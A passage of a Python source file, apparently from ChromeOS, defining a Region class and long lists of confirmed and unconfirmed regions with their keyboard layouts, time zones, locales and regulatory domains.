:py:attr:`keyboard_mechanical_layout`, and this is reserved for logical\n layouts.\n\n This is identical to the legacy VPD ``keyboard_layout`` value.\"\"\"\n\n time_zones = None\n \"\"\"A list of default `tz database time zone\n `_\n identifiers (e.g., ``America/Los_Angeles``). 
See\n `timezone_settings.cc `_ for supported time\n zones.\n\n This is identical to the legacy VPD ``initial_timezone`` value.\"\"\"\n\n locales = None\n \"\"\"A list of default locale codes (e.g., ``en-US``); see\n `l10n_util.cc `_ for supported locales.\n\n This is identical to the legacy VPD ``initial_locale`` field.\"\"\"\n\n keyboard_mechanical_layout = None\n \"\"\"The keyboard's mechanical layout (``ANSI`` [US-like], ``ISO``\n [UK-like], ``JIS`` [Japanese], ``ABNT2`` [Brazilian] or ``KS`` [Korean]).\"\"\"\n\n description = None\n \"\"\"A human-readable description of the region.\n This defaults to :py:attr:`region_code` if not set.\"\"\"\n\n notes = None\n \"\"\"Implementation notes about the region. This may be None.\"\"\"\n\n regulatory_domain = None\n \"\"\"An ISO 3166-1 alpha 2 upper-cased two-letter region code for setting\n Wireless regulatory. See crosbug.com/p/38745 for more details.\n\n When omitted, this will derive from region_code.\"\"\"\n\n confirmed = None\n \"\"\"An optional boolean flag to indicate if the region data is confirmed.\"\"\"\n\n FIELDS = ['region_code', 'description', 'keyboards',\n 'time_zones', 'locales', 'keyboard_mechanical_layout',\n 'regulatory_domain']\n \"\"\"Names of fields that define the region.\"\"\"\n\n def __init__(self, region_code, keyboards, time_zones, locales,\n keyboard_mechanical_layout, description=None, notes=None,\n regdomain=None):\n \"\"\"Constructor.\n\n Args:\n region_code: See :py:attr:`region_code`.\n keyboards: See :py:attr:`keyboards`. A single string is accepted for\n backward compatibility.\n time_zones: See :py:attr:`time_zones`.\n locales: See :py:attr:`locales`. A single string is accepted\n for backward compatibility.\n keyboard_mechanical_layout: See :py:attr:`keyboard_mechanical_layout`.\n description: See :py:attr:`description`.\n notes: See :py:attr:`notes`.\n regdomain: See :py:attr:`regulatory_domain`.\n \"\"\"\n\n def regdomain_from_region(region):\n if region.find('.') >= 0:\n region = region[:region.index('.')]\n if len(region) == 2:\n return region.upper()\n return None\n\n # Quick check: should be 'gb', not 'uk'\n if region_code == 'uk':\n raise RegionException(\"'uk' is not a valid region code (use 'gb')\")\n\n self.region_code = region_code\n self.keyboards = MakeList(keyboards)\n self.time_zones = MakeList(time_zones)\n self.locales = MakeList(locales)\n self.keyboard_mechanical_layout = keyboard_mechanical_layout\n self.description = description or region_code\n self.notes = notes\n self.regulatory_domain = (regdomain or regdomain_from_region(region_code))\n self.confirmed = None\n\n for f in (self.keyboards, self.locales):\n assert all(isinstance(x, str) for x in f), (\n 'Expected a list of strings, not %r' % f)\n for f in self.keyboards:\n assert KEYBOARD_PATTERN.match(f), (\n 'Keyboard pattern %r does not match %r' % (\n f, KEYBOARD_PATTERN.pattern))\n for f in self.locales:\n assert LOCALE_PATTERN.match(f), (\n 'Locale %r does not match %r' % (\n f, LOCALE_PATTERN.pattern))\n assert (self.regulatory_domain and\n len(self.regulatory_domain) == 2 and\n self.regulatory_domain.upper() == self.regulatory_domain), (\n 'Regulatory domain settings error for region %s' % region_code)\n\n def __repr__(self):\n return 'Region(%s)' % (', '.join([getattr(self, x) for x in self.FIELDS]))\n\n def GetFieldsDict(self):\n \"\"\"Returns a dict of all substantive fields.\n\n notes and description are excluded.\n \"\"\"\n return dict((k, getattr(self, k)) for k in self.FIELDS)\n\nKML = 
Region.KeyboardMechanicalLayout\nREGIONS_LIST = [\n Region(\n 'au', 'xkb:us::eng', 'Australia/Sydney', 'en-AU', KML.ANSI,\n 'Australia'),\n Region(\n 'be', 'xkb:be::nld', 'Europe/Brussels', 'en-GB', KML.ISO,\n 'Belgium', (\n 'Flemish (Belgian Dutch) keyboard; British English language for '\n 'neutrality')),\n Region(\n 'br', 'xkb:br::por', 'America/Sao_Paulo', 'pt-BR', KML.ABNT2,\n 'Brazil (ABNT2)', (\n 'ABNT2 = ABNT NBR 10346 variant 2. This is the preferred layout '\n 'for Brazil. ABNT2 is mostly an ISO layout, but it 12 keys between '\n 'the shift keys; see http://goo.gl/twA5tq')),\n Region(\n 'br.abnt', 'xkb:br::por', 'America/Sao_Paulo', 'pt-BR', KML.ISO,\n 'Brazil (ABNT)', (\n 'Like ABNT2, but lacking the extra key to the left of the right '\n 'shift key found in that layout. ABNT2 (the \"br\" region) is '\n 'preferred to this layout')),\n Region(\n 'br.usintl', 'xkb:us:intl:eng', 'America/Sao_Paulo', 'pt-BR', KML.ANSI,\n 'Brazil (US Intl)', (\n 'Brazil with US International keyboard layout. ABNT2 (\"br\") and '\n 'ABNT1 (\"br.abnt1 \") are both preferred to this.')),\n Region(\n 'ca.ansi', 'xkb:us::eng', 'America/Toronto', 'en-CA', KML.ANSI,\n 'Canada (US keyboard)', (\n 'Canada with US (ANSI) keyboard. Only allowed if there are '\n 'separate US English, Canadian English, and French SKUs. '\n 'Not for en/fr hybrid ANSI keyboards; for that you would want '\n 'ca.hybridansi. See http://goto/cros-canada')),\n Region(\n 'ca.fr', 'xkb:ca::fra', 'America/Toronto', 'fr-CA', KML.ISO,\n 'Canada (French keyboard)', (\n 'Canadian French (ISO) keyboard. The most common configuration for '\n 'Canadian French SKUs. See http://goto/cros-canada')),\n Region(\n 'ca.hybrid', 'xkb:ca:eng:eng', 'America/Toronto', 'en-CA', KML.ISO,\n 'Canada (hybrid ISO)', (\n 'Canada with hybrid (ISO) xkb:ca:eng:eng + xkb:ca::fra keyboard, '\n 'defaulting to English language and keyboard. Used only if there '\n 'needs to be a single SKU for all of Canada. See '\n 'http://goto/cros-canada')),\n Region(\n 'ca.hybridansi', 'xkb:ca:eng:eng', 'America/Toronto', 'en-CA', KML.ANSI,\n 'Canada (hybrid ANSI)', (\n 'Canada with hybrid (ANSI) xkb:ca:eng:eng + xkb:ca::fra keyboard, '\n 'defaulting to English language and keyboard. Used only if there '\n 'needs to be a single SKU for all of Canada. See '\n 'http://goto/cros-canada')),\n Region(\n 'ca.multix', 'xkb:ca:multix:fra', 'America/Toronto', 'fr-CA', KML.ISO,\n 'Canada (multilingual)', (\n \"Canadian Multilingual keyboard; you probably don't want this. 
See \"\n 'http://goto/cros-canada')),\n Region(\n 'ch', 'xkb:ch::ger', 'Europe/Zurich', 'de-CH', KML.ISO,\n 'Switzerland', (\n 'German keyboard')),\n Region(\n 'de', 'xkb:de::ger', 'Europe/Berlin', 'de', KML.ISO,\n 'Germany'),\n Region(\n 'es', 'xkb:es::spa', 'Europe/Madrid', 'es', KML.ISO,\n 'Spain'),\n Region(\n 'fi', 'xkb:fi::fin', 'Europe/Helsinki', 'fi', KML.ISO,\n 'Finland'),\n Region(\n 'fr', 'xkb:fr::fra', 'Europe/Paris', 'fr', KML.ISO,\n 'France'),\n Region(\n 'gb', 'xkb:gb:extd:eng', 'Europe/London', 'en-GB', KML.ISO,\n 'UK'),\n Region(\n 'ie', 'xkb:gb:extd:eng', 'Europe/Dublin', 'en-GB', KML.ISO,\n 'Ireland'),\n Region(\n 'in', 'xkb:us::eng', 'Asia/Calcutta', 'en-US', KML.ANSI,\n 'India'),\n Region(\n 'it', 'xkb:it::ita', 'Europe/Rome', 'it', KML.ISO,\n 'Italy'),\n Region(\n 'latam-es-419', 'xkb:es::spa', 'America/Mexico_City', 'es-419', KML.ISO,\n 'Hispanophone Latin America', (\n 'Spanish-speaking countries in Latin America, using the Iberian '\n '(Spain) Spanish keyboard, which is increasingly dominant in '\n 'Latin America. Known to be correct for '\n 'Chile, Colombia, Mexico, Peru; '\n 'still unconfirmed for other es-419 countries. The old Latin '\n 'American layout (xkb:latam::spa) has not been approved; before '\n 'using that you must seek review through http://goto/vpdsettings. '\n 'See also http://goo.gl/Iffuqh. Note that 419 is the UN M.49 '\n 'region code for Latin America'), 'MX'),\n Region(\n 'my', 'xkb:us::eng', 'Asia/Kuala_Lumpur', 'ms', KML.ANSI,\n 'Malaysia'),\n Region(\n 'nl', 'xkb:us:intl:eng', 'Europe/Amsterdam', 'nl', KML.ANSI,\n 'Netherlands'),\n Region(\n 'nordic', 'xkb:se::swe', 'Europe/Stockholm', 'en-US', KML.ISO,\n 'Nordics', (\n 'Unified SKU for Sweden, Norway, and Denmark. This defaults '\n 'to Swedish keyboard layout, but starts with US English language '\n 'for neutrality. Use if there is a single combined SKU for Nordic '\n 'countries.'), 'SE'),\n Region(\n 'nz', 'xkb:us::eng', 'Pacific/Auckland', 'en-NZ', KML.ANSI,\n 'New Zealand'),\n Region(\n 'ph', 'xkb:us::eng', 'Asia/Manila', 'en-US', KML.ANSI,\n 'Philippines'),\n Region(\n 'ru', ['xkb:us::eng', 'xkb:ru::rus'], 'Europe/Moscow', 'ru', KML.ANSI,\n 'Russia', (\n 'For R31+ only; R30 and earlier must use US keyboard for login')),\n Region(\n 'se', 'xkb:se::swe', 'Europe/Stockholm', 'sv', KML.ISO,\n 'Sweden', (\n 'Use this if there separate SKUs for Nordic countries (Sweden, '\n 'Norway, and Denmark), or the device is only shipping to Sweden. '\n \"If there is a single unified SKU, use 'nordic' instead.\")),\n Region(\n 'sg', 'xkb:us::eng', 'Asia/Singapore', 'en-GB', KML.ANSI,\n 'Singapore'),\n Region(\n 'us', 'xkb:us::eng', 'America/Los_Angeles', 'en-US', KML.ANSI,\n 'United States'),\n Region(\n 'jp', ['xkb:jp::jpn', 'ime:jp:mozc_jp'], 'Asia/Tokyo', 'ja', KML.JIS,\n 'Japan'),\n Region(\n 'za', 'xkb:gb:extd:eng', 'Africa/Johannesburg', 'en-ZA', KML.ISO,\n 'South Africa'),\n Region(\n 'ng', 'xkb:us:intl:eng', 'Africa/Lagos', 'en-GB', KML.ANSI,\n 'Nigeria'),\n Region(\n 'hk', ['xkb:us::eng', 'ime:zh-t:cangjie', 'ime:zh-t:quick',\n 'ime:zh-t:array', 'ime:zh-t:dayi', 'ime:zh-t:zhuyin',\n 'ime:zh-t:pinyin'], 'Asia/Hong_Kong', ['zh-TW', 'en-GB',\n 'zh-CN'], KML.ANSI,\n 'Hong Kong'),\n Region(\n 'gcc', ['xkb:us::eng', 'm17n:ar', 't13n:ar'], 'Asia/Riyadh', [\n 'ar', 'en-GB'],\n KML.ANSI,\n 'Gulf Cooperation Council (GCC)', (\n 'GCC is a regional intergovernmental political and economic '\n 'union consisting of all Arab states of the Persian Gulf except '\n 'for Iraq. 
Its member states are the Islamic monarchies of '\n 'Bahrain, Kuwait, Oman, Qatar, Saudi Arabia, and the United Arab '\n 'Emirates.'), 'SA'),\n Region(\n 'cz', ['xkb:cz::cze', 'xkb:cz:qwerty:cze'], 'Europe/Prague', [\n 'cs', 'en-GB'], KML.ISO,\n 'Czech Republic'),\n Region(\n 'th', ['xkb:us::eng', 'm17n:th', 'm17n:th_pattajoti',\n 'm17n:th_tis'], 'Asia/Bangkok', ['th', 'en-GB'], KML.ANSI,\n 'Thailand'),\n Region(\n 'id', 'xkb:us::ind', 'Asia/Jakarta', ['id', 'en-GB'], KML.ANSI,\n 'Indonesia'),\n Region(\n 'tw', ['xkb:us::eng', 'ime:zh-t:zhuyin', 'ime:zh-t:array',\n 'ime:zh-t:dayi', 'ime:zh-t:cangjie', 'ime:zh-t:quick',\n 'ime:zh-t:pinyin'], 'Asia/Taipei', ['zh-TW', 'en-US'], KML.ANSI,\n 'Taiwan'),\n Region(\n 'pl', 'xkb:pl::pol', 'Europe/Warsaw', ['pl', 'en-GB'], KML.ANSI,\n 'Poland'),\n Region(\n 'gr', ['xkb:us::eng', 'xkb:gr::gre', 't13n:el'], 'Europe/Athens', [\n 'el', 'en-GB'], KML.ANSI,\n 'Greece'),\n Region(\n 'il', ['xkb:us::eng', 'xkb:il::heb', 't13n:he'], 'Asia/Jerusalem', [\n 'he', 'en-US', 'ar'], KML.ANSI,\n 'Israel'),\n Region(\n 'pt', 'xkb:pt::por', 'Europe/Lisbon', ['pt-PT', 'en-GB'], KML.ISO,\n 'Portugal'),\n Region(\n 'ro', ['xkb:us::eng', 'xkb:ro::rum'], 'Europe/Bucharest', [\n 'ro', 'hu', 'de', 'en-GB'], KML.ISO,\n 'Romania'),\n Region(\n 'kr', ['xkb:us::eng', 'ime:ko:hangul'], 'Asia/Seoul', [\n 'ko', 'en-US'], KML.ANSI,\n 'South Korea'),\n Region(\n 'ae', 'xkb:us::eng', 'Asia/Dubai', 'ar', KML.ANSI,\n 'UAE'),\n Region(\n 'za.us', 'xkb:us::eng', 'Africa/Johannesburg', 'en-ZA', KML.ANSI,\n 'South Africa'),\n Region(\n 'vn', ['xkb:us::eng', 'm17n:vi_telex', 'm17n:vi_vni', 'm17n:vi_viqr',\n 'm17n:vi_tcvn'], 'Asia/Ho_Chi_Minh', ['vi', 'en-GB', 'en-US',\n 'fr', 'zh-TW'], KML.ANSI,\n 'Vietnam'),\n Region(\n 'at', ['xkb:de::ger', 'xkb:de:neo:ger'], 'Europe/Vienna', [\n 'de', 'en-GB'], KML.ISO,\n 'Austria'),\n Region(\n 'sk', ['xkb:us::eng', 'xkb:sk::slo'], 'Europe/Bratislava', [\n 'sk', 'hu', 'cs', 'en-GB'], KML.ISO,\n 'Slovakia'),\n Region(\n 'ch.usintl', 'xkb:us:intl:eng', 'Europe/Zurich', 'en-US', KML.ANSI,\n 'Switzerland (US Intl)', (\n 'Switzerland with US International keyboard layout.')),\n Region(\n 'pe', 'xkb:latam::spa', 'America/Lima', 'es-419', KML.ANSI,\n 'Peru'),\n Region(\n 'sa', 'xkb:us::eng', 'Asia/Riyadh', ['ar', 'en'], KML.ANSI,\n 'Saudi Arabia'),\n Region(\n 'mx', 'xkb:latam::spa', 'America/Mexico_City', 'es-MX', KML.ANSI,\n 'Mexico'),\n Region(\n 'cl', 'xkb:latam::spa', 'America/Santiago', 'es-419', KML.ANSI,\n 'Chile'),\n Region(\n 'kw', ['xkb:us::eng', 'm17n:ar', 't13n:ar'], 'Asia/Kuwait', [\n 'ar', 'en'], KML.ANSI,\n 'Kuwait'),\n Region(\n 'uy', 'xkb:latam::spa', 'America/Montevideo', 'es-419', KML.ANSI,\n 'Uruguay'),\n Region(\n 'tr', ['xkb:tr::tur', 'xkb:tr:f:tur'], 'Europe/Istanbul', [\n 'tr', 'en-GB'], KML.ISO,\n 'Turkey'),\n Region(\n 'ar', 'xkb:latam::spa', 'America/Argentina/Buenos_Aires', [\n 'es-AR', ], KML.ISO,\n 'Argentina'),\n Region(\n 'gb.usext', 'xkb:us:altgr-intl:eng', 'Europe/London', 'en-GB', KML.ISO,\n 'UK (US extended keyboard)', (\n 'GB with US extended keyboard')),\n Region(\n 'bg', ['xkb:bg::bul', 'xkb:bg:phonetic:bul'], 'Europe/Sofia', [\n 'bg', 'tr', 'en-US'], KML.ANSI,\n 'Bulgaria'),\n Region(\n 'jp.us', ['xkb:us::eng', 'ime:jp:mozc_us'], 'Asia/Tokyo', 'ja',\n KML.ANSI, 'Japan with US keyboard'),\n Region(\n 'is', 'xkb:is::ice', 'Atlantic/Reykjavik', ['is', 'en-GB'], KML.ISO,\n 'Iceland'),\n Region(\n 'us.intl', 'xkb:us:intl:eng', 'America/Los_Angeles', 'en-US', KML.ANSI,\n 'US (English Intl)'),\n Region(\n 'co', 
'xkb:latam::spa', 'America/Bogota', 'es-CO', KML.ANSI,\n 'Colombia'),\n ]\n\n\"\"\"A list of :py:class:`regions.Region` objects for\nall **confirmed** regions. A confirmed region is a region whose\nproperties are known to be correct and valid: all contents (locale / timezone /\nkeyboards) are supported by Chrome.\"\"\"\n\n\nUNCONFIRMED_REGIONS_LIST = [\n Region(\n 'bd', 'xkb:bd::ben', 'Asia/Dhaka', ['bn-BD', 'en'], KML.ANSI,\n 'Bangladesh'),\n Region(\n 'bf', 'xkb:bf::fra', 'Africa/Ouagadougou', 'fr-BF', KML.ANSI,\n 'Burkina Faso'),\n Region(\n 'ba', 'xkb:ba::bos', 'Europe/Sarajevo', 'bs', KML.ANSI,\n 'Bosnia and Herzegovina'),\n Region(\n 'bb', 'xkb:bb::eng', 'America/Barbados', 'en-BB', KML.ANSI,\n 'Barbados'),\n Region(\n 'wf', 'xkb:us::eng', 'Pacific/Wallis', ['wls', 'fud'], KML.ANSI,\n 'Wallis and Futuna'),\n Region(\n 'bl', 'xkb:bl::fra', 'America/St_Barthelemy', 'fr', KML.ANSI,\n 'Saint Barthelemy'),\n Region(\n 'bm', 'xkb:bm::eng', 'Atlantic/Bermuda', ['en-BM', 'pt'], KML.ANSI,\n 'Bermuda'),\n Region(\n 'bn', 'xkb:bn::msa', 'Asia/Brunei', ['ms-BN', 'en-BN'], KML.ANSI,\n 'Brunei'),\n Region(\n 'bo', 'xkb:latam::spa', 'America/La_Paz', ['es-419', 'qu'], KML.ANSI,\n 'Bolivia'),\n Region(\n 'bh', 'xkb:bh::ara', 'Asia/Bahrain', ['ar', 'en', 'fa', 'ru'], KML.ANSI,\n 'Bahrain'),\n Region(\n 'bi', 'xkb:bi::fra', 'Africa/Bujumbura', ['fr-BI', 'rn'], KML.ANSI,\n 'Burundi'),\n Region(\n 'bj', 'xkb:bj::fra', 'Africa/Porto-Novo', 'fr-BJ', KML.ANSI,\n 'Benin'),\n Region(\n 'bt', 'xkb:bt::dzo', 'Asia/Thimphu', 'dz', KML.ANSI,\n 'Bhutan'),\n Region(\n 'jm', 'xkb:jm::eng', 'America/Jamaica', 'en-JM', KML.ANSI,\n 'Jamaica'),\n Region(\n 'bw', 'xkb:bw::eng', 'Africa/Gaborone', ['en-BW', 'tn-BW'], KML.ANSI,\n 'Botswana'),\n Region(\n 'ws', 'xkb:ws::smo', 'Pacific/Apia', ['sm', 'en-WS'], KML.ANSI,\n 'Samoa'),\n Region(\n 'bq', 'xkb:bq::nld', 'America/Kralendijk', ['nl', 'en'], KML.ANSI,\n 'Bonaire, Saint Eustatius and Saba '),\n Region(\n 'bs', 'xkb:bs::eng', 'America/Nassau', 'en-BS', KML.ANSI,\n 'Bahamas'),\n Region(\n 'je', 'xkb:je::eng', 'Europe/Jersey', ['en', 'pt'], KML.ANSI,\n 'Jersey'),\n Region(\n 'by', 'xkb:by::bel', 'Europe/Minsk', ['be', 'ru'], KML.ANSI,\n 'Belarus'),\n Region(\n 'bz', 'xkb:bz::eng', 'America/Belize', ['en-BZ', 'es'], KML.ANSI,\n 'Belize'),\n Region(\n 'rw', 'xkb:rw::kin', 'Africa/Kigali', ['rw', 'en-RW'], KML.ANSI,\n 'Rwanda'),\n Region(\n 'rs', 'xkb:rs::srp', 'Europe/Belgrade', ['sr', 'hu', 'bs'], KML.ANSI,\n 'Serbia'),\n Region(\n 'tl', 'xkb:us::eng', 'Asia/Dili', ['tet', 'pt-TL', 'en'], KML.ANSI,\n 'East Timor'),\n Region(\n 're', 'xkb:re::fra', 'Indian/Reunion', 'fr-RE', KML.ANSI,\n 'Reunion'),\n Region(\n 'tm', 'xkb:tm::tuk', 'Asia/Ashgabat', ['tk', 'ru', 'uz'], KML.ANSI,\n 'Turkmenistan'),\n Region(\n 'tj', 'xkb:tj::tgk', 'Asia/Dushanbe', ['tg', 'ru'], KML.ANSI,\n 'Tajikistan'),\n Region(\n 'tk', 'xkb:us::eng', 'Pacific/Fakaofo', ['tkl', 'en-TK'], KML.ANSI,\n 'Tokelau'),\n Region(\n 'gw', 'xkb:gw::por', 'Africa/Bissau', ['pt-GW', 'pov'], KML.ANSI,\n 'Guinea-Bissau'),\n Region(\n 'gu', 'xkb:gu::eng', 'Pacific/Guam', ['en-GU', 'ch-GU'], KML.ANSI,\n 'Guam'),\n Region(\n 'gt', 'xkb:latam::spa', 'America/Guatemala', 'es-419', KML.ANSI,\n 'Guatemala'),\n Region(\n 'gs', 'xkb:gs::eng', 'Atlantic/South_Georgia', 'en', KML.ANSI,\n 'South Georgia and the South Sandwich Islands'),\n Region(\n 'gq', 'xkb:gq::spa', 'Africa/Malabo', ['es-419', 'fr'], KML.ANSI,\n 'Equatorial Guinea'),\n Region(\n 'gp', 'xkb:gp::fra', 'America/Guadeloupe', 'fr-GP', KML.ANSI,\n 'Guadeloupe'),\n 
Region(\n 'gy', 'xkb:gy::eng', 'America/Guyana', 'en-GY', KML.ANSI,\n 'Guyana'),\n Region(\n 'gg', 'xkb:gg::eng', 'Europe/Guernsey', ['en', 'fr'], KML.ANSI,\n 'Guernsey'),\n Region(\n 'gf', 'xkb:gf::fra', 'America/Cayenne', 'fr-GF', KML.ANSI,\n 'French Guiana'),\n Region(\n 'ge', 'xkb:ge::geo', 'Asia/Tbilisi', 'ka', KML.ANSI,\n 'Georgia'),\n Region(\n 'gd', 'xkb:gd::eng', 'America/Grenada', 'en-GD', KML.ANSI,\n 'Grenada'),\n Region(\n 'ga', 'xkb:ga::fra', 'Africa/Libreville', 'fr-GA', KML.ANSI,\n 'Gabon'),\n Region(\n 'sv', 'xkb:latam::spa', 'America/El_Salvador', 'es-419', KML.ANSI,\n 'El Salvador'),\n Region(\n 'gn', 'xkb:gn::fra', 'Africa/Conakry', 'fr-GN', KML.ANSI,\n 'Guinea'),\n Region(\n 'gm', 'xkb:gm::eng', 'Africa/Banjul', ['en-GM', 'mnk', 'wof'], KML.ANSI,\n 'Gambia'),\n Region(\n 'gl', 'xkb:gl::kal', ['America/Godthab', 'America/Danmarkshavn',\n 'America/Scoresbysund', 'America/Thule'], [\n 'kl', 'da-GL', 'en'], KML.ANSI,\n 'Greenland'),\n Region(\n 'gi', 'xkb:gi::eng', 'Europe/Gibraltar', ['en-GI', 'es'], KML.ANSI,\n 'Gibraltar'),\n Region(\n 'gh', 'xkb:gh::eng', 'Africa/Accra', ['en-GH', 'ak', 'ee'], KML.ANSI,\n 'Ghana'),\n Region(\n 'om', 'xkb:om::ara', 'Asia/Muscat', ['ar', 'en', 'bal'], KML.ANSI,\n 'Oman'),\n Region(\n 'tn', 'xkb:tn::ara', 'Africa/Tunis', ['ar', 'fr'], KML.ANSI,\n 'Tunisia'),\n Region(\n 'jo', 'xkb:jo::ara', 'Asia/Amman', ['ar', 'en'], KML.ANSI,\n 'Jordan'),\n Region(\n 'hn', 'xkb:latam::spa', 'America/Tegucigalpa', 'es-HN', KML.ANSI,\n 'Honduras'),\n Region(\n 'hr', 'xkb:hr::scr', 'Europe/Zagreb', ['hr', 'en-GB'], KML.ISO,\n 'Croatia'),\n Region(\n 'ht', 'xkb:ht::hat', 'America/Port-au-Prince', ['ht'], KML.ANSI,\n 'Haiti'),\n Region(\n 'hu', ['xkb:us::eng', 'xkb:hu::hun'], 'Europe/Budapest', [\n 'hu', 'en-GB'], KML.ISO,\n 'Hungary'),\n Region(\n 've', 'xkb:latam::spa', 'America/Caracas', 'es-419', KML.ANSI,\n 'Venezuela'),\n Region(\n 'pr', 'xkb:pr::eng', 'America/Puerto_Rico', ['en-PR'], KML.ANSI,\n 'Puerto Rico'),\n Region(\n 'ps', 'xkb:ps::ara', ['Asia/Gaza', 'Asia/Hebron'], 'ar', KML.ANSI,\n 'Palestinian Territory'),\n Region(\n 'pw', 'xkb:us::eng', 'Pacific/Palau', ['pau', 'sov', 'en-PW', 'tox',\n 'ja', 'fil', 'zh'], KML.ANSI,\n 'Palau'),\n Region(\n 'sj', 'xkb:sj::nor', 'Arctic/Longyearbyen', ['no', 'ru'], KML.ANSI,\n 'Svalbard and Jan Mayen'),\n Region(\n 'py', 'xkb:latam::spa', 'America/Asuncion', ['es-419', 'gn'], KML.ANSI,\n 'Paraguay'),\n Region(\n 'iq', 'xkb:iq::ara', 'Asia/Baghdad', ['ar', 'ku', 'hy'], KML.ANSI,\n 'Iraq'),\n Region(\n 'pa', 'xkb:latam::spa', 'America/Panama', ['es-419', 'en'], KML.ANSI,\n 'Panama'),\n Region(\n 'pf', 'xkb:pf::fra', ['Pacific/Tahiti', 'Pacific/Marquesas',\n 'Pacific/Gambier'], ['fr-PF', 'ty'], KML.ANSI,\n 'French Polynesia'),\n Region(\n 'pg', 'xkb:pg::eng', ['Pacific/Port_Moresby',\n 'Pacific/Bougainville'], ['en-PG', 'ho', 'meu',\n 'tpi'], KML.ANSI,\n 'Papua New Guinea'),\n Region(\n 'pk', 'xkb:pk::urd', 'Asia/Karachi', ['ur-PK', 'en-PK', 'pa', 'sd',\n 'ps', 'brh'], KML.ANSI,\n 'Pakistan'),\n Region(\n 'pn', 'xkb:pn::eng', 'Pacific/Pitcairn', 'en-PN', KML.ANSI,\n 'Pitcairn'),\n Region(\n 'pm', 'xkb:pm::fra', 'America/Miquelon', 'fr-PM', KML.ANSI,\n 'Saint Pierre and Miquelon'),\n Region(\n 'zm', 'xkb:zm::eng', 'Africa/Lusaka', ['en-ZM', 'bem', 'loz', 'lun',\n 'lue', 'ny', 'toi'], KML.ANSI,\n 'Zambia'),\n Region(\n 'eh', 'xkb:eh::ara', 'Africa/El_Aaiun', ['ar', 'mey'], KML.ANSI,\n 'Western Sahara'),\n Region(\n 'ee', 'xkb:ee::est', 'Europe/Tallinn', ['et', 'ru', 'en-GB'], KML.ISO,\n 'Estonia'),\n Region(\n 
'eg', 'xkb:eg::ara', 'Africa/Cairo', ['ar', 'en', 'fr'],\n KML.ANSI, 'Egypt'),\n Region(\n 'ec', 'xkb:latam::spa', ['America/Guayaquil'], 'es-419', KML.ANSI,\n 'Ecuador'),\n Region(\n 'sb', 'xkb:sb::eng', 'Pacific/Guadalcanal', ['en-SB', 'tpi'], KML.ANSI,\n 'Solomon Islands'),\n Region(\n 'et', 'xkb:et::amh', 'Africa/Addis_Ababa', ['am', 'en-ET', 'om-ET',\n 'ti-ET'], KML.ANSI,\n 'Ethiopia'),\n Region(\n 'so', 'xkb:so::som', 'Africa/Mogadishu', ['so-SO', 'ar'], KML.ANSI,\n 'Somalia'),\n Region(\n 'zw', 'xkb:zw::eng', 'Africa/Harare', ['en-ZW', 'sn', 'nr'], KML.ANSI,\n 'Zimbabwe'),\n Region(\n 'er', 'xkb:er::aar', 'Africa/Asmara', ['aa-ER', 'ar', 'tig', 'kun',\n 'ti-ER'], KML.ANSI,\n 'Eritrea'),\n Region(\n 'me', 'xkb:me::srp', 'Europe/Podgorica', ['sr', 'hu', 'bs', 'sq', 'hr',\n 'rom'], KML.ANSI,\n 'Montenegro'),\n Region(\n 'md', 'xkb:md::ron', 'Europe/Chisinau', ['ro', 'ru', 'gag'], KML.ANSI,\n 'Moldova'),\n Region(\n 'mg', 'xkb:mg::fra', 'Indian/Antananarivo', ['fr-MG', 'mg'], KML.ANSI,\n 'Madagascar'),\n Region(\n 'mf', 'xkb:mf::fra', 'America/Marigot', 'fr', KML.ANSI, 'Saint Martin'),\n Region(\n 'ma', 'xkb:ma::ara', 'Africa/Casablanca', ['ar', 'fr'], KML.ANSI,\n 'Morocco'),\n Region(\n 'mc', 'xkb:mc::fra', 'Europe/Monaco', ['fr-MC', 'en', 'it'], KML.ANSI,\n 'Monaco'),\n Region(\n 'uz', 'xkb:uz::uzb', ['Asia/Samarkand', 'Asia/Tashkent'],\n ['uz', 'ru', 'tg'], KML.ANSI, 'Uzbekistan'),\n Region(\n 'mm', 'xkb:mm::mya', 'Asia/Rangoon', 'my', KML.ANSI, 'Myanmar',\n None),\n Region(\n 'ml', 'xkb:ml::fra', 'Africa/Bamako', ['fr-ML', 'bm'], KML.ANSI,\n 'Mali'),\n Region(\n 'mo', 'xkb:mo::zho', 'Asia/Macau', ['zh', 'zh-MO', 'pt'], KML.ANSI,\n 'Macao'),\n Region(\n 'mn', 'xkb:mn::mon', ['Asia/Ulaanbaatar', 'Asia/Hovd',\n 'Asia/Choibalsan'], ['mn', 'ru'], KML.ANSI,\n 'Mongolia'),\n Region(\n 'mh', 'xkb:mh::mah', ['Pacific/Majuro'], ['mh' 'en-MH'], KML.ANSI,\n 'Marshall Islands'),\n Region(\n 'mk', 'xkb:mk::mkd', 'Europe/Skopje', ['mk', 'sq', 'tr'], KML.ANSI,\n 'Macedonia'),\n Region(\n 'mu', 'xkb:mu::eng', 'Indian/Mauritius', ['en-MU', 'bho'], KML.ANSI,\n 'Mauritius'),\n Region(\n 'mt', ['xkb:us::eng'], 'Europe/Malta', ['mt', 'en-GB'], KML.ISO,\n 'Malta'),\n Region(\n 'mw', 'xkb:mw::nya', 'Africa/Blantyre', ['ny', 'yao', 'tum'], KML.ANSI,\n 'Malawi'),\n Region(\n 'mv', 'xkb:mv::div', 'Indian/Maldives', ['dv', 'en'], KML.ANSI,\n 'Maldives'),\n Region(\n 'mq', 'xkb:mq::fra', 'America/Martinique', 'fr-MQ', KML.ANSI,\n 'Martinique'),\n Region(\n 'mp', 'xkb:us::eng', 'Pacific/Saipan', ['fil', 'tl', 'zh', 'ch-MP',\n 'en-MP'], KML.ANSI,\n 'Northern Mariana Islands'),\n Region(\n 'ms', 'xkb:ms::eng', 'America/Montserrat', 'en-MS', KML.ANSI,\n 'Montserrat'),\n Region(\n 'mr', 'xkb:mr::ara', 'Africa/Nouakchott', ['ar', 'fuc', 'snk', 'fr',\n 'mey', 'wo'], KML.ANSI,\n 'Mauritania'),\n Region(\n 'im', 'xkb:im::eng', 'Europe/Isle_of_Man', ['en', 'gv'], KML.ANSI,\n 'Isle of Man'),\n Region(\n 'ug', 'xkb:ug::eng', 'Africa/Kampala', ['en-UG', 'lg', 'ar'], KML.ANSI,\n 'Uganda'),\n Region(\n 'tz', 'xkb:tz::swa', 'Africa/Dar_es_Salaam', ['sw-TZ', 'en'], KML.ANSI,\n 'Tanzania'),\n Region(\n 'io', 'xkb:io::eng', 'Indian/Chagos', 'en-IO', KML.ANSI,\n 'British Indian Ocean Territory'),\n Region(\n 'sh', 'xkb:sh::eng', 'Atlantic/St_Helena', 'en-SH', KML.ANSI,\n 'Saint Helena'),\n Region(\n 'fj', 'xkb:fj::eng', 